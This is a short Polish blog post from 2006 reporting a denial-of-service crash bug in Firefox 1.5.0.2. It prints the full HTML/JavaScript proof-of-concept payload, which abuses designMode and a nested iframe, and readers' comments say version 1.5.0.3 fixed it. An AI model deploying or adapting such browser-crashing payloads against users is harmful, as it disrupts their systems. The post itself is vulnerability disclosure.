Bug w Firefoksie

26 kwietnia 2006

Znaleziono groźny bug w tej „wspaniałej” przeglądarce. Pojawił się exploit wysypujący najnowszego FireFoxa (1.5.0.2) :)

Na informacje o tym bugu natknąłem się w notce Piotra Koniecznego

Przetestowałem i potwierdzam działanie exploita :)
Poniżej znajduje się magiczny kodzik działający cuda :D

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo">
</textarea>
  <script>
       var textarea = document.getElementsByName("x_OtherInfo");
       textarea=textarea.item(0);
           var htmlarea = document.createElement("div");
       htmlarea.className = "htmlarea"; 
       textarea.parentNode.insertBefore(htmlarea, textarea);
       var iframe = document.createElement("iframe");
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document;
                 doc.designMode = "on";
                 doc.open();
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus()
  doc.close();
  </script>
</textarea>

Przetestować można tutaj: Firefox 1.5.0.2 DoS Exploit
Opis luki: http://www.securident.com/~securide/vuln/ff.txt

Pewnie prace nad łatką już trwają…

Notatka została zapisana w środa, 26 kwietnia 2006 roku o godzinie 23:29 w kategorii /dev/null z etykietą , , , . Możesz przyłączyć się do dyskusji dodając komentarz, lub nawiązać do notatki przez trackback ze swojej strony.

Podobne notatki:

Może zainteresują Cię również następujące, pododbne notatki:

Komentarze i nawiązania (3)

Kanał RSS komentarzy

  1. Nav:

    03/05/2006 @ 9:20:03 | #1

    No i Mal załatali, w wersji 1.5.0.3 nic się nie dzieje.

  2. MalCom:

    03/05/2006 @ 12:26:45 | #2

    No wczoraj wyszła wersja 1.5.0.3 usuwająca właśnie ten krytyczny bug związany z designMode umożliwiający wykonanie ataku Denial of Service.

  3. Nav:

    03/05/2006 @ 12:39:45 | #3

    Mimo tego i tak używam Opery :] nie do zajechania :]

Dodaj swój komentarz

Możesz użyć tych tagów XHTML-a: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Jeśli chcesz wstawić kilku linijkowy fragment kodu, użyj tagów <pre lang="x"></pre> (gdzie x język kodu np. cpp, perl, html). W ten sposób kod zostanie odpowiednio sformatowany i pokolorowany przez system.

Uwaga!

Na tym blogu działa system cache oraz filtr antyspamowy. Twój komentarz może być widoczny na stronie z pewnym opóźnieniem. Proszę o cierpliwość. Jeśli utraciłeś już wszystkie jej zasoby poinformuj mnie o tym, być może system uznał Cię za spamera ;)